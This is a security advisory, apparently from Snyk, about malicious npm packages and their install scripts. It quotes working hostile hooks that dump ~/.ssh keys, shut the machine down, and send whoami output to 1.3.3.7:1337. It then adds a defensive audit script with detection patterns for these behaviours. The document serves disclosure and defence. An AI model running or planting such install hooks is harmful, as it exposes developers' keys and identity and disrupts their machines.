Malicious Package

Affecting maybemaliciouspackage package, ALL versions

Overview

maybemaliciouspackage is a malicious package used to demonstrate or test malicious install scripts. Such scripts can send your local SSH keys to an attacker, or download malicious files and run them in the background.

This is especially dangerous in production runtime environments, where environment variables tend to consist of keys, passwords, tokens and other secrets.

On August 1st, 2017, npm deprecated all of the malicious typosquatting packages in the list below.

The packages and their install scripts are:

{
  "name": "maybemaliciouspackage",
  "scripts": {
    "postinstall": "find ~/.ssh | xargs cat || true && echo '\n\n\n\n\n\nOH HEY LOOK SSH KEYS\n\n\n\n\n\n\n'"
  }
},
{
  "name": "deasyncp",
  "scripts": {
    "preinstall": "say U WOT M8; shutdown -s now"
  }
},
{
  "name": "harmlesspackage",
  "scripts": {
    "postinstall": "echo '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThanks for your SSH         keys :)' && curl -X GET http://1.3.3.7:1337/\\?$(whoami)"
  }
},
{
  "name": "npm-exploit",
  "scripts": {
    "install": "mkdir -p ~/Desktop/sploit && touch ~/Desktop/sploit/haxx"
  }
}

Remediation

Avoid usage of this package altogether.
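Every script in this advisory runs from an npm install-phase lifecycle hook, so a defender's first check is to read those hooks before a dependency is installed. The following is an added example (not the advisory's or npm's code): a dependency-free Node.js audit that extracts the install-phase hooks from a package.json and flags the behaviours seen in the four packages above; the sample manifests are the advisory's own entries with the echo padding shortened, plus one constructed benign control.

```javascript
// Added example, not part of the Snyk advisory or of npm: audit a package.json
// for lifecycle hooks that run during `npm install` and flag the behaviours
// seen in the packages above. Plain Node.js, no dependencies.

// npm lifecycle hooks that run when a dependency is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators taken from the scripts in this advisory: reading SSH material,
// calling out to the network, touching the home directory, shutting down.
const INDICATORS = [
  { id: 'ssh-key-access', re: /\.ssh\b/ },
  { id: 'network-exfil', re: /\b(curl|wget|nc)\b/ },
  { id: 'home-dir-path', re: /(~|\$HOME)\// },
  { id: 'shutdown-or-reboot', re: /\b(shutdown|reboot)\b/ },
];

// Returns one finding per install-phase hook in the manifest (string or object).
function auditManifest(manifest) {
  const pkg = typeof manifest === 'string' ? JSON.parse(manifest) : manifest;
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const indicators = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.id);
    findings.push({ name: pkg.name, hook, command: cmd, indicators });
  }
  return findings;
}

// Audits many manifests (e.g. every node_modules/*/package.json) at once.
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// The four manifests from this advisory (echo padding shortened) plus one
// constructed benign control that has no install-phase hooks.
const SAMPLE_MANIFESTS = [
  { name: 'maybemaliciouspackage',
    scripts: { postinstall: "find ~/.ssh | xargs cat || true && echo 'OH HEY LOOK SSH KEYS'" } },
  { name: 'deasyncp', scripts: { preinstall: 'say U WOT M8; shutdown -s now' } },
  { name: 'harmlesspackage',
    scripts: { postinstall: "echo 'Thanks for your SSH keys :)' && curl -X GET http://1.3.3.7:1337/\\?$(whoami)" } },
  { name: 'npm-exploit',
    scripts: { install: 'mkdir -p ~/Desktop/sploit && touch ~/Desktop/sploit/haxx' } },
  { name: 'benign-control', scripts: { build: 'tsc -p .', test: 'node test.js' } },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`${f.name} [${f.hook}] ${f.indicators.join(',') || 'no indicator'}: ${f.command}`);
}
```

Any install-phase hook is worth reading even when no indicator fires; npm's `--ignore-scripts` flag (or `ignore-scripts=true` in .npmrc) stops these hooks from running at all, and an audit like this is how you decide which packages to exempt.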

CVSS Score

8.8 (high severity)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: High
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Credit: Jordan Wright
CWE: CWE-506
Snyk ID: npm:maybemaliciouspackage:20170917
Disclosed: 08 Aug, 2017
Published: 17 Sep, 2017